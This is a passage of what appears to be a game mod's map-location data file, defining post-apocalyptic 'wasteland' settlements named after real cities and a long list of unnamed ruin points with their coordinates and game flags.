("wasteland5", "Wasteland Wilmington", icon_point_mark|pf_label_medium|pf_village, no_menu, pt_none, fac_hot_points, aggressiveness_0, ai_bhvr_hold, 0, (1080.6, -111.56), []),
("wasteland6", "Wasteland Saint Augustine", icon_point_mark|pf_label_medium|pf_village, no_menu, pt_none, fac_hot_points, aggressiveness_0, ai_bhvr_hold, 0, (1117.88, -62.2), []),
("wasteland7", "Wasteland Oklahoma", icon_point_mark|pf_label_medium|pf_village, no_menu, pt_none, fac_hot_points, aggressiveness_0, ai_bhvr_hold, 0, (1294.36, -126.72), []),
("wasteland8", "Wasteland Kansas", icon_point_mark|pf_label_medium|pf_village, no_menu, pt_none, fac_hot_points, aggressiveness_0, ai_bhvr_hold, 0, (1262.32, -171.0), []),
("wasteland9", "Wasteland Hauston", icon_point_mark|pf_label_medium|pf_village, no_menu, pt_none, fac_hot_points, aggressiveness_0, ai_bhvr_hold, 0, (1271.24, -61.04), []),
("wasteland10", "Wasteland Santa clara", icon_point_mark|pf_label_medium|pf_village, no_menu, pt_none, fac_hot_points, aggressiveness_0, ai_bhvr_hold, 0, (1102.24, 19.04), []),
("wasteland11", "Wasteland New orleans", icon_point_mark|pf_label_medium|pf_village, no_menu, pt_none, fac_hot_points, aggressiveness_0, ai_bhvr_hold, 0, (1214.32, -62.04), []),
("wasteland12", "Wasteland Rio de janeiro", icon_point_mark|pf_label_medium|pf_village, no_menu, pt_none, fac_hot_points, aggressiveness_0, ai_bhvr_hold, 0, (702.2, 470.4), []),
("wasteland13", "Wasteland Salvador", icon_point_mark|pf_label_medium|pf_village, no_menu, pt_none, fac_hot_points, aggressiveness_0, ai_bhvr_hold, 0, (648.64, 366.78), []),
("wasteland14", "Wasteland Reykjabik", icon_point_mark|pf_label_medium|pf_village, no_menu, pt_none, fac_hot_points, aggressiveness_0, ai_bhvr_hold, 0, (469.14, -574.7), []),
("wasteland15", "Wasteland Vinland", icon_point_mark|pf_label_medium|pf_village, no_menu, pt_none, fac_hot_points, aggressiveness_0, ai_bhvr_hold, 0, (852.12, -326.56), []),
("wasteland16", "Wasteland Brattalid", icon_point_mark|pf_label_medium|pf_village, no_menu, pt_none, fac_hot_points, aggressiveness_0, ai_bhvr_hold, 0, (720.12, -493.96), []),
("ruin_1", " ", icon_point_mark|pf_village, no_menu, pt_none, fac_neutral, aggressiveness_0, ai_bhvr_hold, 0, (27.08, 593.92), []),
("ruin_2", " ", icon_point_mark|pf_village, no_menu, pt_none, fac_neutral, aggressiveness_0, ai_bhvr_hold, 0, (-1183.62, -131.16), []),
("ruin_3", " ", icon_point_mark|pf_village, no_menu, pt_none, fac_neutral, aggressiveness_0, ai_bhvr_hold, 0, (-107.96, -62.92), []),
("ruin_4", " ", icon_point_mark|pf_village, no_menu, pt_none, fac_neutral, aggressiveness_0, ai_bhvr_hold, 0, (-27.32, -159.2), []),
("ruin_5", " ", icon_point_mark|pf_village, no_menu, pt_none, fac_neutral, aggressiveness_0, ai_bhvr_hold, 0, (112.0, -228.0), []),
("ruin_6", " ", icon_point_mark|pf_village, no_menu, pt_none, fac_neutral, aggressiveness_0, ai_bhvr_hold, 0, (92.0, -212.0), []),
("ruin_7", " ", icon_point_mark|pf_village, no_menu, pt_none, fac_neutral, aggressiveness_0, ai_bhvr_hold, 0, (260.0, -220.0), []),
("ruin_8", " ", icon_point_mark|pf_village, no_menu, pt_none, fac_neutral, aggressiveness_0, ai_bhvr_hold, 0, (-19.0, -164.0), []),
("ruin_9", " ", icon_point_mark|pf_village, no_menu, pt_none, fac_neutral, aggressiveness_0, ai_bhvr_hold, 0, (249.2, -340.0), []),
("ruin_10", " ", icon_point_mark|pf_village, no_menu, pt_none, fac_neutral, aggressiveness_0, ai_bhvr_hold, 0, (-120.0, -12.0), []),
("ruin_11", " ", icon_point_mark|pf_village, no_menu, pt_none, fac_neutral, aggressiveness_0, ai_bhvr_hold, 0, (-1042.4, -202.4), []),
("ruin_12", " ", icon_point_mark|pf_village, no_menu, pt_none, fac_neutral, aggressiveness_0, ai_bhvr_hold, 0, (-38.0, -124.0), []),
("ruin_13", " ", icon_point_mark|pf_village, no_menu, pt_none, fac_neutral, aggressiveness_0, ai_bhvr_hold, 0, (-58.46, -179.66), []),
("ruin_14", " ", icon_point_mark|pf_village, no_menu, pt_none, fac_neutral, aggressiveness_0, ai_bhvr_hold, 0, (246.8, -299.2), []),
("ruin_15", " ", icon_point_mark|pf_village, no_menu, pt_none, fac_neutral, aggressiveness_0, ai_bhvr_hold, 0, (262.6, -285.68), []),
("ruin_16", " ", icon_point_mark|pf_village, no_menu, pt_none, fac_neutral, aggressiveness_0, ai_bhvr_hold, 0, (728.0, -576.0), []),
("ruin_17", " ", icon_point_mark|pf_village, no_menu, pt_none, fac_neutral, aggressiveness_0, ai_bhvr_hold, 0, (324.0, -168.0), []),
("ruin_18", " ", icon_point_mark|pf_village, no_menu, pt_none, fac_neutral, aggressiveness_0, ai_bhvr_hold, 0, (205.88, -297.56), []),
("ruin_19", " ", icon_point_mark|pf_village, no_menu, pt_none, fac_neutral, aggressiveness_0, ai_bhvr_hold, 0, (270.24, -145.66), []),
("ruin_20", " ", icon_point_mark|pf_village, no_menu, pt_none, fac_neutral, aggressiveness_0, ai_bhvr_hold, 0, (-1045.2, -189.6), []),
("ruin_21", " ", icon_point_mark|pf_village, no_menu, pt_none, fac_neutral, aggressiveness_0, ai_bhvr_hold, 0, (-120.0, -24.0), []),
("ruin_22", " ", icon_point_mark|pf_village, no_menu, pt_none, fac_neutral, aggressiveness_0, ai_bhvr_hold, 0, (1407.8, -147.36), []),
("ruin_23", " ", icon_point_mark|pf_village, no_menu, pt_none, fac_neutral, aggressiveness_0, ai_bhvr_hold, 0, (1197.2, 39.6), []),
("ruin_24", " ", icon_point_mark|pf_village, no_menu, pt_none, fac_neutral, aggressiveness_0, ai_bhvr_hold, 0, (659.16, -625.0), []),
("ruin_25", " ", icon_point_mark|pf_village, no_menu, pt_none, fac_neutral, aggressiveness_0, ai_bhvr_hold, 0, (1025.28, 161.92), []),
("ruin_26", " ", icon_point_mark|pf_village, no_menu, pt_none, fac_neutral, aggressiveness_0, ai_bhvr_hold, 0, (1022.84, 372.52), []),
("ruin_27", " ", icon_point_mark|pf_village, no_menu, pt_none, fac_neutral, aggressiveness_0, ai_bhvr_hold, 0, (-635.2, 134.0), []),
("ruin_28", " ", icon_point_mark|pf_village, no_menu, pt_none, fac_neutral, aggressiveness_0, ai_bhvr_hold, 0, (-156.6, -65.52), []),
("ruin_29", " ", icon_point_mark|pf_village, no_menu, pt_none, fac_neutral, aggressiveness_0, ai_bhvr_hold, 0, (-259.72, -95.0), []),
("ruin_30", " ", icon_point_mark|pf_village, no_menu, pt_none, fac_neutral, aggressiveness_0, ai_bhvr_hold, 0, (-895.24, 103.12), []),
("ruin_31", " ", icon_point_mark|pf_village, no_menu, pt_none, fac_neutral, aggressiveness_0, ai_bhvr_hold, 0, (-1240.0, -119.2), []),
("ruin_32", " ", icon_point_mark|pf_village, no_menu, pt_none, fac_neutral, aggressiveness_0, ai_bhvr_hold, 0, (-1015.2, -161.6), []),
("ruin_33", " ", icon_point_mark|pf_village, no_menu, pt_none, fac_neutral, aggressiveness_0, ai_bhvr_hold, 0, (-964.9, -115.64), []),
("ruin_34", " ", icon_point_mark|pf_village, no_menu, pt_none, fac_neutral, aggressiveness_0, ai_bhvr_hold, 0, (1423.8, 516.72), []),
("ruin_35", " ", icon_point_mark|pf_village, no_menu, pt_none, fac_neutral, aggressiveness_0, ai_bhvr_hold, 0, (-1158.32, -140.28), []),
("ruin_36", " ", icon_point_mark|pf_village, no_menu, pt_none, fac_neutral, aggressiveness_0, ai_bhvr_hold, 0, (279.68, 107.16), []),
("ruin_37", " ", icon_point_mark|pf_village, no_menu, pt_none, fac_neutral, aggressiveness_0, ai_bhvr_hold, 0, (-113.1, 20.28), []),
("ruin_38", " ", icon_point_mark|pf_village, no_menu, pt_none, fac_neutral, aggressiveness_0, ai_bhvr_hold, 0, (298.0, -152.0), []),
("ruin_39", " ", icon_point_mark|pf_village, no_menu, pt_none, fac_neutral, aggressiveness_0, ai_bhvr_hold, 0, (-102.6, -74.4), []),
("ruin_40", " ", icon_point_mark|pf_village, no_menu, pt_none, fac_neutral, aggressiveness_0, ai_bhvr_hold, 0, (-55.4, 440.0), []),
("ruin_41", " ", icon_point_mark|pf_village, no_menu, pt_none, fac_neutral, aggressiveness_0, ai_bhvr_hold, 0, (1093.48, -222.0), []),
("ruin_42", " ", icon_point_mark|pf_village, no_menu, pt_none, fac_neutral, aggressiveness_0, ai_bhvr_hold, 0, (1223.52, 250.64), []),
("ruin_43", " ", icon_point_mark|pf_village, no_menu, pt_none, fac_neutral, aggressiveness_0, ai_bhvr_hold, 0, (-762.4, -58.8), []),
("ruin_44", " ", icon_point_mark|pf_village, no_menu, pt_none, fac_neutral, aggressiveness_0, ai_bhvr_hold, 0, (-30.0, -160.8), []),
("ruin_45", " ", icon_point_mark|pf_village, no_menu, pt_none, fac_neutral, aggressiveness_0, ai_bhvr_hold, 0, (276.0, -441.8), []),
("ruin_46", " ", icon_point_mark|pf_village, no_menu, pt_none, fac_neutral, aggressiveness_0, ai_bhvr_hold, 0, (-1033.66, -183.48), []),
("ruin_47", " ", icon_point_mark|pf_village, no_menu, pt_none, fac_neutral, aggressiveness_0, ai_bhvr_hold, 0, (-1016.48, 19.84), []),
("ruin_48", " ", icon_point_mark|pf_village, no_menu, pt_none, fac_neutral, aggressiveness_0, ai_bhvr_hold, 0, (-1250.24, -123.56), []),
("ruin_49", " ", icon_point_mark|pf_village, no_menu, pt_none, fac_neutral, aggressiveness_0, ai_bhvr_hold, 0, (-1198.24, -94.36), []),
("ruin_50", " ", icon_point_mark|pf_village, no_menu, pt_none, fac_neutral, aggressiveness_0, ai_bhvr_hold, 0, (-1155.98, -102.8), []),
("ruin_51", " ", icon_point_mark|pf_village, no_menu, pt_none, fac_neutral, aggressiveness_0, ai_bhvr_hold, 0, (-1149.92, -211.4), []),
("ruin_52", " ", icon_point_mark|pf_village, no_menu, pt_none, fac_neutral, aggressiveness_0, ai_bhvr_hold, 0, (-138.14, -244.58), []),
("ruin_53", " ", icon_point_mark|pf_village, no_menu, pt_none, fac_neutral, aggressiveness_0, ai_bhvr_hold, 0, (-1155.2, -136.0), []),
("ruin_54", " ", icon_point_mark|pf_village, no_menu, pt_none, fac_neutral, aggressiveness_0, ai_bhvr_hold, 0, (-1018.64, -65.2), []),
("ruin_55", " ", icon_point_mark|pf_village, no_menu, pt_none, fac_neutral, aggressiveness_0, ai_bhvr_hold, 0, (-788.96, -174.68), []),
("ruin_56", " ", icon_point_mark|pf_village, no_menu, pt_none, fac_neutral, aggressiveness_0, ai_bhvr_hold, 0, (-907.28, -95.76), []),
("ruin_57", " ", icon_point_mark|pf_village, no_menu, pt_none, fac_neutral, aggressiveness_0, ai_bhvr_hold, 0, (-903.6, -58.72), []),
("ruin_58", " ", icon_point_mark|pf_village, no_menu, pt_none, fac_neutral, aggressiveness_0, ai_bhvr_hold, 0, (-1006.8, -118.8), []),
("ruin_59", " ", icon_point_mark|pf_village, no_menu, pt_none, fac_neutral, aggressiveness_0, ai_bhvr_hold, 0, (-896.0, -76.4), []),
("ruin_60", " ", icon_point_mark|pf_village, no_menu, pt_none, fac_neutral, aggressiveness_0, ai_bhvr_hold, 0, (-1056.0, -8.0), []),
("ruin_61", " ", icon_point_mark|pf_village, no_menu, pt_none, fac_neutral, aggressiveness_0, ai_bhvr_hold, 0, (-1154.72, -125.16), []),
("ruin_62", " ", icon_point_mark|pf_village, no_menu, pt_none, fac_neutral, aggressiveness_0, ai_bhvr_hold, 0, (-1253.6, -116.0), []),
("ruin_63", " ", icon_point_mark|pf_village, no_menu, pt_none, fac_neutral, aggressiveness_0, ai_bhvr_hold, 0, (-1160.62, -154.06), []),
("ruin_64", " ", icon_point_mark|pf_village, no_menu, pt_none, fac_neutral, aggressiveness_0, ai_bhvr_hold, 0, (-893.2, -286.8), []),
("ruin_65", " ", icon_point_mark|pf_village, no_menu, pt_none, fac_neutral, aggressiveness_0, ai_bhvr_hold, 0, (-790.0, -318.8), []),
("ruin_66", " ", icon_point_mark|pf_village, no_menu, pt_none, fac_neutral, aggressiveness_0, ai_bhvr_hold, 0, (-1165.12, -21.64), []),
("ruin_67", " ", icon_point_mark|pf_village, no_menu, pt_none, fac_neutral, aggressiveness_0, ai_bhvr_hold, 0, (-1287.12, -123.0), []),
("ruin_68", " ", icon_point_mark|pf_village, no_menu, pt_none, fac_neutral, aggressiveness_0, ai_bhvr_hold, 0, (-1169.84, -130.0), []),
("ruin_69", " ", icon_point_mark|pf_village, no_menu, pt_none, fac_neutral, aggressiveness_0, ai_bhvr_hold, 0, (-622.36, -32.4), []),
("ruin_70", " ", icon_point_mark|pf_village, no_menu, pt_none, fac_neutral, aggressiveness_0, ai_bhvr_hold, 0, (-654.88, 165.88), []),
("ruin_71", " ", icon_point_mark|pf_village, no_menu, pt_none, fac_neutral, aggressiveness_0, ai_bhvr_hold, 0, (-651.2, 164.8), []),
("ruin_72", " ", icon_point_mark|pf_village, no_menu, pt_none, fac_neutral, aggressiveness_0, ai_bhvr_hold, 0, (-614.96, 11.36), []),
("ruin_73", " ", icon_point_mark|pf_village, no_menu, pt_none, fac_neutral, aggressiveness_0, ai_bhvr_hold, 0, (-589.88, 42.92), []),
("ruin_74", " ", icon_point_mark|pf_village, no_menu, pt_none, fac_neutral, aggressiveness_0, ai_bhvr_hold, 0, (-594.8, 86.4), []),
("ruin_75", " ", icon_point_mark|pf_village, no_menu, pt_none, fac_neutral, aggressiveness_0, ai_bhvr_hold, 0, (-698.64, -5.68), []),
("ruin_76", " ", icon_point_mark|pf_village, no_menu, pt_none, fac_neutral, aggressiveness_0, ai_bhvr_hold, 0, (-713.04, 42.12), []),
("ruin_77", " ", icon_point_mark|pf_village, no_menu, pt_none, fac_neutral, aggressiveness_0, ai_bhvr_hold, 0, (-1073.12, 158.88), []),
("ruin_78", " ", icon_point_mark|pf_village, no_menu, pt_none, fac_neutral, aggressiveness_0, ai_bhvr_hold, 0, (-1072.0, 140.6), []),
("ruin_79", " ", icon_point_mark|pf_village, no_menu, pt_none, fac_neutral, aggressiveness_0, ai_bhvr_hold, 0, (-975.4, 316.94), []),
("ruin_80", " ", icon_point_mark|pf_village, no_menu, pt_none, fac_neutral, aggressiveness_0, ai_bhvr_hold, 0, (-869.2, 94.4), []),
("ruin_81", " ", icon_point_mark|pf_village, no_menu, pt_none, fac_neutral, aggressiveness_0, ai_bhvr_hold, 0, (-976.56, 317.44), []),
("ruin_82", " ", icon_point_mark|pf_village, no_menu, pt_none, fac_neutral, aggressiveness_0, ai_bhvr_hold, 0, (-954.0, 88.4), []),
("ruin_83", " ", icon_point_mark|pf_village, no_menu, pt_none, fac_neutral, aggressiveness_0, ai_bhvr_hold, 0, (-1381.2, 417.2), []),
("ruin_84", " ", icon_point_mark|pf_village, no_menu, pt_none, fac_neutral, aggressiveness_0, ai_bhvr_hold, 0, (-1170.4, 406.8), []),
("ruin_85", " ", icon_point_mark|pf_village, no_menu, pt_none, fac_neutral, aggressiveness_0, ai_bhvr_hold, 0, (-1010.0, 498.8), []),
("ruin_86", " ", icon_point_mark|pf_village, no_menu, pt_none, fac_neutral, aggressiveness_0, ai_bhvr_hold, 0, (-1199.2, 498.0), []),
("ruin_87", " ", icon_point_mark|pf_village, no_menu, pt_none, fac_neutral, aggressiveness_0, ai_bhvr_hold, 0, (-1411.6, 589.04), []),
("ruin_88", " ", icon_point_mark|pf_village, no_menu, pt_none, fac_neutral, aggressiveness_0, ai_bhvr_hold, 0, (179.6, -131.4), []),
("ruin_89", " ", icon_point_mark|pf_village, no_menu, pt_none, fac_neutral, aggressiveness_0, ai_bhvr_hold, 0, (306.0, 71.6), []),
("ruin_90", " ", icon_point_mark|pf_village, no_menu, pt_none, fac_neutral, aggressiveness_0, ai_bhvr_hold, 0, (-129.28, -15.08), []),
("ruin_91", " ", icon_point_mark|pf_village, no_menu, pt_none, fac_neutral, aggressiveness_0, ai_bhvr_hold, 0, (121.4, -145.88), []),
("ruin_92", " ", icon_point_mark|pf_village, no_menu, pt_none, fac_neutral, aggressiveness_0, ai_bhvr_hold, 0, (-9.28, -95.0), []),
("ruin_93", " ", icon_point_mark|pf_village, no_menu, pt_none, fac_neutral, aggressiveness_0, ai_bhvr_hold, 0, (76.04, -92.96), []),
("ruin_94", " ", icon_point_mark|pf_village, no_menu, pt_none, fac_neutral, aggressiveness_0, ai_bhvr_hold, 0, (289.36, -104.98), []),
("ruin_95", " ", icon_point_mark|pf_village, no_menu, pt_none, fac_neutral, aggressiveness_0, ai_bhvr_hold, 0, (-139.32, 74.88), []),
("ruin_96", " ", icon_point_mark|pf_village, no_menu, pt_none, fac_neutral, aggressiveness_0, ai_bhvr_hold, 0, (156.0, -141.6), []),
("ruin_97", " ", icon_point_mark|pf_village, no_menu, pt_none, fac_neutral, aggressiveness_0, ai_bhvr_hold, 0, (-204.4, 277.44), []),
("ruin_98", " ", icon_point_mark|pf_village, no_menu, pt_none, fac_neutral, aggressiveness_0, ai_bhvr_hold, 0, (-68.0, 500.4), []),
("ruin_99", " ", icon_point_mark|pf_village, no_menu, pt_none, fac_neutral, aggressiveness_0, ai_bhvr_hold, 0, (-177.2, 270.8), []),
("ruin_100", " ", icon_point_mark|pf_village, no_menu, pt_none, fac_neutral, aggressiveness_0, ai_bhvr_hold, 0, (126.8, -17.2), []),
("ruin_101", " ", icon_point_mark|pf_village, no_menu, pt_none, fac_neutral, aggressiveness_0, ai_bhvr_hold, 0, (229.64, 85.82), []),
("ruin_102", " ", icon_point_mark|pf_village, no_menu, pt_none, fac_neutral, aggressiveness_0, ai_bhvr_hold, 0, (-8.4, 424.68), []),
("ruin_103", " ", icon_point_mark|pf_village, no_menu, pt_none, fac_neutral, aggressiveness_0, ai_bhvr_hold, 0, (-69.6, 510.4), []),
("ruin_104", " ", icon_point_mark|pf_village, no_menu, pt_none, fac_neutral, aggressiveness_0, ai_bhvr_hold, 0, (4.4, 50.4), []),
("ruin_105", " ", icon_point_mark|pf_village, no_menu, pt_none, fac_neutral, aggressiveness_0, ai_bhvr_hold, 0, (-183.76, -29.36), []),
("ruin_106", " ", icon_point_mark|pf_village, no_menu, pt_none, fac_neutral, aggressiveness_0, ai_bhvr_hold, 0, (-167.6, -92.44), []),
("ruin_107", " ", icon_point_mark|pf_village, no_menu, pt_none, fac_neutral, aggressiveness_0, ai_bhvr_hold, 0, (-391.04, 8.0), []),
("ruin_108", " ", icon_point_mark|pf_village, no_menu, pt_none, fac_neutral, aggressiveness_0, ai_bhvr_hold, 0, (-407.48, -53.48), []),
("ruin_109", " ", icon_point_mark|pf_village, no_menu, pt_none, fac_neutral, aggressiveness_0, ai_bhvr_hold, 0, (-285.2, -113.52), []),
("ruin_110", " ", icon_point_mark|pf_village, no_menu, pt_none, fac_neutral, aggressiveness_0, ai_bhvr_hold, 0, (-132.4, -119.26), []),
("ruin_111", " ", icon_point_mark|pf_village, no_menu, pt_none, fac_neutral, aggressiveness_0, ai_bhvr_hold, 0, (-309.08, -182.32), []),
("ruin_112", " ", icon_point_mark|pf_village, no_menu, pt_none, fac_neutral, aggressiveness_0, ai_bhvr_hold, 0, (-372.92, -148.16), []),
("ruin_113", " ", icon_point_mark|pf_village, no_menu, pt_none, fac_neutral, aggressiveness_0, ai_bhvr_hold, 0, (-237.08, -130.08), []),
("ruin_114", " ", icon_point_mark|pf_village, no_menu, pt_none, fac_neutral, aggressiveness_0, ai_bhvr_hold, 0, (-361.8, 119.48), []),
("ruin_115", " ", icon_point_mark|pf_village, no_menu, pt_none, fac_neutral, aggressiveness_0, ai_bhvr_hold, 0, (1212.0, 65.36), []),
("ruin_116", " ", icon_point_mark|pf_village, no_menu, pt_none, fac_neutral, aggressiveness_0, ai_bhvr_hold, 0, (1311.6, 62.0), []),
("ruin_117", " ", icon_point_mark|pf_village, no_menu, pt_none, fac_neutral, aggressiveness_0, ai_bhvr_hold, 0, (894.12, 193.44), []),
("ruin_118", " ", icon_point_mark|pf_village, no_menu, pt_none, fac_neutral, aggressiveness_0, ai_bhvr_hold, 0, (908.92, 188.64), []),
("ruin_119", " ", icon_point_mark|pf_village, no_menu, pt_none, fac_neutral, aggressiveness_0, ai_bhvr_hold, 0, (1406.0, -136.0), []),
("ruin_120", " ", icon_point_mark|pf_village, no_menu, pt_none, fac_neutral, aggressiveness_0, ai_bhvr_hold, 0, (1073.28, 331.92), []),
("ruin_121", " ", icon_point_mark|pf_village, no_menu, pt_none, fac_neutral, aggressiveness_0, ai_bhvr_hold, 0, (963.12, 635.36), []),
("ruin_122", " ", icon_point_mark|pf_village, no_menu, pt_none, fac_neutral, aggressiveness_0, ai_bhvr_hold, 0, (1291.0, 39.44), []),
("ruin_123", " ", icon_point_mark|pf_village, no_menu, pt_none, fac_neutral, aggressiveness_0, ai_bhvr_hold, 0, (799.76, -626.6), []),
("ruin_124", " ", icon_point_mark|pf_village, no_menu, pt_none, fac_neutral, aggressiveness_0, ai_bhvr_hold, 0, (1056.0, 380.8), []),
("ruin_125", " ", icon_point_mark|pf_village, no_menu, pt_none, fac_neutral, aggressiveness_0, ai_bhvr_hold, 0, (1200.0, 99.6), []),
("ruin_126", " ", icon_point_mark|pf_village, no_menu, pt_none, fac_neutral, aggressiveness_0, ai_bhvr_hold, 0, (1405.6, -152.0), []),
("ruin_127", " ", icon_point_mark|pf_village, no_menu, pt_none, fac_neutral, aggressiveness_0, ai_bhvr_hold, 0, (1059.8, 213.88), []),
("ruin_128", " ", icon_point_mark|pf_village, no_menu, pt_none, fac_neutral, aggressiveness_0, ai_bhvr_hold, 0, (694.0, 322.8), []),
("ruin_129", " ", icon_point_mark|pf_village, no_menu, pt_none, fac_neutral, aggressiveness_0, ai_bhvr_hold, 0, (1057.6, 44.0), []),
("ruin_130", " ", icon_point_mark|pf_village, no_menu, pt_none, fac_neutral, aggressiveness_0, ai_bhvr_hold, 0, (1079.6, 344.8), []),
("ruin_131", " ", icon_point_mark|pf_village, no_menu, pt_none, fac_neutral, aggressiveness_0, ai_bhvr_hold, 0, (942.4, 472.0), []),
("ruin_132", " ", icon_point_mark|pf_village, no_menu, pt_none, fac_neutral, aggressiveness_0, ai_bhvr_hold, 0, (1180.0, 188.0), []),
("ruin_133", " ", icon_point_mark|pf_village, no_menu, pt_none, fac_neutral, aggressiveness_0, ai_bhvr_hold, 0, (1438.0, -298.0), []),
("ruin_134", " ", icon_point_mark|pf_village, no_menu, pt_none, fac_neutral, aggressiveness_0, ai_bhvr_hold, 0, (1205.2, 105.6), []),
("ruin_135", " ", icon_point_mark|pf_village, no_menu, pt_none, fac_neutral, aggressiveness_0, ai_bhvr_hold, 0, (154.0, -531.04), []),
("ruin_136", " ", icon_point_mark|pf_village, no_menu, pt_none, fac_neutral, aggressiveness_0, ai_bhvr_hold, 0, (-39.92, -494.08), []),
("ruin_137", " ", icon_point_mark|pf_village, no_menu, pt_none, fac_neutral, aggressiveness_0, ai_bhvr_hold, 0, (126.0, -414.8), []),
("ruin_138", " ", icon_point_mark|pf_village, no_menu, pt_none, fac_neutral, aggressiveness_0, ai_bhvr_hold, 0, (111.0, -424.56), []),
("ruin_139", " ", icon_point_mark|pf_village, no_menu, pt_none, fac_neutral, aggressiveness_0, ai_bhvr_hold, 0, (-503.46, -178.48), []),
("ruin_140", " ", icon_point_mark|pf_village, no_menu, pt_none, fac_neutral, aggressiveness_0, ai_bhvr_hold, 0, (-596.0, -232.8), []),
("ruin_141", " ", icon_point_mark|pf_village, no_menu, pt_none, fac_neutral, aggressiveness_0, ai_bhvr_hold, 0, (-406.2, -159.8), []),
("ruin_142", " ", icon_point_mark|pf_village, no_menu, pt_none, fac_neutral, aggressiveness_0, ai_bhvr_hold, 0, (-515.2, -233.0), []),
("ruin_143", " ", icon_point_mark|pf_village, no_menu, pt_none, fac_neutral, aggressiveness_0, ai_bhvr_hold, 0, (-1156.56, -509.16), []),
("ruin_144", " ", icon_point_mark|pf_village, no_menu, pt_none, fac_neutral, aggressiveness_0, ai_bhvr_hold, 0, (-701.44, -317.04), []),
("ruin_145", " ", icon_point_mark|pf_village, no_menu, pt_none, fac_neutral, aggressiveness_0, ai_bhvr_hold, 0, (-1266.0, -258.0), []),
("ruin_146", " ", icon_point_mark|pf_village, no_menu, pt_none, fac_neutral, aggressiveness_0, ai_bhvr_hold, 0, (965.84, 554.88), []),
("ruin_147", " ", icon_point_mark|pf_village, no_menu, pt_none, fac_neutral, aggressiveness_0, ai_bhvr_hold, 0, (-156.68, -77.84), []),
("ruin_148", " ", icon_point_mark|pf_village, no_menu, pt_none, fac_neutral, aggressiveness_0, ai_bhvr_hold, 0, (-1165.6, -144.16), []),
("ruin_149", " ", icon_point_mark|pf_village, no_menu, pt_none, fac_neutral, aggressiveness_0, ai_bhvr_hold, 0, (-244.68, -138.56), []),
("ruin_150", " ", icon_point_mark|pf_village, no_menu, pt_none, fac_neutral, aggressiveness_0, ai_bhvr_hold, 0, (-1015.32, -66.2), []),
("ruin_151", " ", icon_point_mark|pf_village, no_menu, pt_none, fac_neutral, aggressiveness_0, ai_bhvr_hold, 0, (-1018.26, -121.1), []),
("ruin_152", " ", icon_point_mark|pf_village, no_menu, pt_none, fac_neutral, aggressiveness_0, ai_bhvr_hold, 0, (-1259.36, -125.88), []),
("ruin_153", " ", icon_point_mark|pf_village, no_menu, pt_none, fac_neutral, aggressiveness_0, ai_bhvr_hold, 0, (-1174.52, -118.44), []),
("ruin_154", " ", icon_point_mark|pf_village, no_menu, pt_none, fac_neutral, aggressiveness_0, ai_bhvr_hold, 0, (-18.08, -168.52), []),
("ruin_155", " ", icon_point_mark|pf_village, no_menu, pt_none, fac_neutral, aggressiveness_0, ai_bhvr_hold, 0, (56.88, -199.68), []),
("ruin_156", " ", icon_point_mark|pf_village, no_menu, pt_none, fac_neutral, aggressiveness_0, ai_bhvr_hold, 0, (-1050.48, -109.4), []),
("ruin_157", " ", icon_point_mark|pf_village, no_menu, pt_none, fac_neutral, aggressiveness_0, ai_bhvr_hold, 0, (-196.96, -143.08), []),
("ruin_158", " ", icon_point_mark|pf_village, no_menu, pt_none, fac_neutral, aggressiveness_0, ai_bhvr_hold, 0, (-28.36, -152.0), []),
("ruin_159", " ", icon_point_mark|pf_village, no_menu, pt_none, fac_neutral, aggressiveness_0, ai_bhvr_hold, 0, (-32.84, -159.2), []),
("ruin_160", " ", icon_point_mark|pf_village, no_menu, pt_none, fac_neutral, aggressiveness_0, ai_bhvr_hold, 0, (156.0, -296.56), []),
("ruin_161", " ", icon_point_mark|pf_village, no_menu, pt_none, fac_neutral, aggressiveness_0, ai_bhvr_hold, 0, (4.64, -167.2), []),
("ruin_162", " ", icon_point_mark|pf_village, no_menu, pt_none, fac_neutral, aggressiveness_0, ai_bhvr_hold, 0, (-57.76, -203.0), []),
("ruin_163", " ", icon_point_mark|pf_village, no_menu, pt_none, fac_neutral, aggressiveness_0, ai_bhvr_hold, 0, (-1143.6, -182.2), []),
("ruin_164", " ", icon_point_mark|pf_village, no_menu, pt_none, fac_neutral, aggressiveness_0, ai_bhvr_hold, 0, (-201.32, 6.6), []),
("ruin_165", " ", icon_point_mark|pf_village, no_menu, pt_none, fac_neutral, aggressiveness_0, ai_bhvr_hold, 0, (-15.6, -329.16), []),
("ruin_166", " ", icon_point_mark|pf_village, no_menu, pt_none, fac_neutral, aggressiveness_0, ai_bhvr_hold, 0, (-234.32, -169.8), []),
("ruin_167", " ", icon_point_mark|pf_village, no_menu, pt_none, fac_neutral, aggressiveness_0, ai_bhvr_hold, 0, (-986.84, -72.8), []),
("ruin_168", " ", icon_point_mark|pf_village, no_menu, pt_none, fac_neutral, aggressiveness_0, ai_bhvr_hold, 0, (180.84, -311.12), []),
("ruin_169", " ", icon_point_mark|pf_village, no_menu, pt_none, fac_neutral, aggressiveness_0, ai_bhvr_hold, 0, (-172.72, -116.28), []),
("ruin_170", " ", icon_point_mark|pf_village, no_menu, pt_none, fac_neutral, aggressiveness_0, ai_bhvr_hold, 0, (-534.16, -224.32), []),
("ruin_171", " ", icon_point_mark|pf_village, no_menu, pt_none, fac_neutral, aggressiveness_0, ai_bhvr_hold, 0, (-1010.48, -116.08), []),
("ruin_end", "ruin end", icon_cantsee|pf_disabled|pf_is_static|pf_no_label|pf_hide_defenders, no_menu, pt_none, fac_neutral, aggressiveness_0, ai_bhvr_hold, 0, (36.0, 36.0), []),
("ruin_dummy_1", "ruin end", icon_cantsee|pf_disabled|pf_is_static|pf_no_label|pf_hide_defenders, no_menu, pt_none, fac_neutral, aggressiveness_0, ai_bhvr_hold, 0, (0.0, 0.0), []),
("ruin_dummy_2", "ruin end", icon_cantsee|pf_disabled|pf_is_static|pf_no_label|pf_hide_defenders, no_menu, pt_none, fac_neutral, aggressiveness_0, ai_bhvr_hold, 0, (0.0, 0.0), []),
("ruin_dummy_3", "ruin end", icon_cantsee|pf_disabled|pf_is_static|pf_no_label|pf_hide_defenders, no_menu, pt_none, fac_neutral, aggressiveness_0, ai_bhvr_hold, 0, (0.0, 0.0), []),
("ruin_dummy_4", "ruin end", icon_cantsee|pf_disabled|pf_is_static|pf_no_label|pf_hide_defenders, no_menu, pt_none, fac_neutral, aggressiveness_0, ai_bhvr_hold, 0, (0.0, 0.0), []),
("ruin_dummy_5", "ruin end", icon_cantsee|pf_disabled|pf_is_static|pf_no_label|pf_hide_defenders, no_menu, pt_none, fac_neutral, aggressiveness_0, ai_bhvr_hold, 0, (0.0, 0.0), []),
